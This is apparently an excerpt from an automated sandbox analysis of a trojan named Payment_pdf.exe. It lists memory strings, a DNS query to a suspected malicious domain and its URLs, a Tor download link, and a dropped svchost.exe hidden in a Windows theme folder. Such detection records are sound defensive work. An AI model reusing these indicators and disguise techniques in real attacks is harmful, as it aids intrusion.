                  Source: svchost.exe, 0000001B.00000003.481630694.0000025027D85000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                  Source: svchost.exe, 0000001B.00000003.481676427.0000025027DC2000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                  Source: svchost.exe, 0000001B.00000003.481676427.0000025027DC2000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                  Source: svchost.exe, 0000001B.00000003.481676427.0000025027DC2000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                  Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
                  Source: Payment_pdf.exe, 00000000.00000003.384124156.00000000055E1000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: svchost.exe, 0000001B.00000002.510562184.00000250274EE000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: Payment_pdf.exe, 00000000.00000003.384124156.00000000055E1000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: Payment_pdf.exe, 00000000.00000002.409692034.0000000002751000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
                  Source: Payment_pdf.exe, 00000000.00000002.409692034.0000000002751000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/4E6D09D3FE7F5C729D5893BBC810E319.html
                  Source: Payment_pdf.exe, 00000000.00000002.409692034.0000000002751000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/A632564F6B586F5A6F356DB5CA3B2690.html
                  Source: WerFault.exe, 0000000F.00000002.492935514.00000000011B7000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft.co
                  Source: Payment_pdf.exe, 00000000.00000003.384124156.00000000055E1000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: svchost.exe, 0000001B.00000002.510562184.00000250274EE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: Payment_pdf.exe, 00000000.00000003.384124156.00000000055E1000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: Payment_pdf.exe, 00000000.00000003.384124156.00000000055E1000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: svchost.exe, 0000001B.00000002.510562184.00000250274EE000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: Payment_pdf.exe, 00000000.00000003.384124156.00000000055E1000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: svchost.exe, 0000001B.00000002.510562184.00000250274EE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: Payment_pdf.exe, 00000000.00000003.384124156.00000000055E1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Payment_pdf.exe, 00000000.00000003.384124156.00000000055E1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                  Source: Payment_pdf.exe, 00000000.00000002.409692034.0000000002751000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                  Source: WerFault.exe, 0000000F.00000003.424086724.0000000004DD0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                  Source: Payment_pdf.exe, 00000000.00000003.384124156.00000000055E1000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: svchost.exe, 0000001B.00000003.481513610.0000025027D63000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.481630694.0000025027D85000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.481676427.0000025027DC2000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                  Source: svchost.exe, 0000001B.00000003.481513610.0000025027D63000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.481630694.0000025027D85000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.481676427.0000025027DC2000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                  Source: svchost.exe, 0000001B.00000003.477375638.0000025027D61000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
                  Source: svchost.exe, 0000001B.00000003.477375638.0000025027D61000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
                  Source: powershell.exe, 00000005.00000003.540007478.0000000008F65000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co1
                  Source: svchost.exe, 0000001B.00000003.493226506.0000025027D6F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.493323322.0000025027DB2000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                  Source: svchost.exe, 0000001B.00000003.493226506.0000025027D6F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.493323322.0000025027DB2000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.493506486.0000025027D91000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                  Source: svchost.exe, 0000001B.00000003.492107395.0000025027D5F000.00000004.00000001.sdmpString found in binary or memory: https://displaycatalog.m
                  Source: svchost.exe, 0000001B.00000003.493226506.0000025027D6F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.493323322.0000025027DB2000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                  Source: powershell.exe, 00000005.00000003.500097206.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                  Source: svchost.exe, 0000001B.00000003.481513610.0000025027D63000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.481630694.0000025027D85000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.481676427.0000025027DC2000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
                  Source: Payment_pdf.exe, 00000000.00000003.384124156.00000000055E1000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: svchost.exe, 0000001B.00000003.477375638.0000025027D61000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
                  Source: svchost.exe, 0000001B.00000003.477375638.0000025027D61000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info
                  Source: svchost.exe, 0000001B.00000003.493226506.0000025027D6F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.493323322.0000025027DB2000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                  Source: svchost.exe, 0000001B.00000003.493226506.0000025027D6F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.493323322.0000025027DB2000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                  Source: Payment_pdf.exe, 00000000.00000002.423869749.0000000003AAE000.00000004.00000001.sdmp, Payment_pdf.exe, 0000000C.00000002.594360112.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

                  System Summary:

                  barindex
                  Initial sample is a PE file and has a suspicious nameShow sources
                  Source: initial sampleStatic PE information: Filename: Payment_pdf.exe
                  Source: initial sampleStatic PE information: Filename: Payment_pdf.exe
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile created: C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJRJump to behavior
                  Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6968 -ip 6968
                  Source: Payment_pdf.exeStatic PE information: invalid certificate
                  Source: Payment_pdf.exeBinary or memory string: OriginalFilename vs Payment_pdf.exe
                  Source: Payment_pdf.exe, 00000000.00000002.422429311.0000000003981000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs Payment_pdf.exe
                  Source: Payment_pdf.exe, 00000000.00000000.325225367.0000000000232000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameToNTDGRS.exe2 vs Payment_pdf.exe
                  Source: Payment_pdf.exe, 00000000.00000002.423869749.0000000003AAE000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDqwB Pon.exe2 vs Payment_pdf.exe
                  Source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Payment_pdf.exe
                  Source: Payment_pdf.exeBinary or memory string: OriginalFilename vs Payment_pdf.exe
                  Source: Payment_pdf.exe, 0000000C.00000000.399361049.00000000009A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameToNTDGRS.exe2 vs Payment_pdf.exe
                  Source: Payment_pdf.exe, 0000000C.00000002.594360112.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameDqwB Pon.exe2 vs Payment_pdf.exe
                  Source: Payment_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@39/19@5/3
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210223Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_01
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6968
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oebs23ox.3ze.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\explorer.exe
                  Source: unknownProcess created: C:\Windows\explorer.exe
                  Source: unknownProcess created: C:\Windows\explorer.exe
                  Source: unknownProcess created: C:\Windows\explorer.exe
                  Source: Payment_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Payment_pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\Payment_pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\Payment_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Payment_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
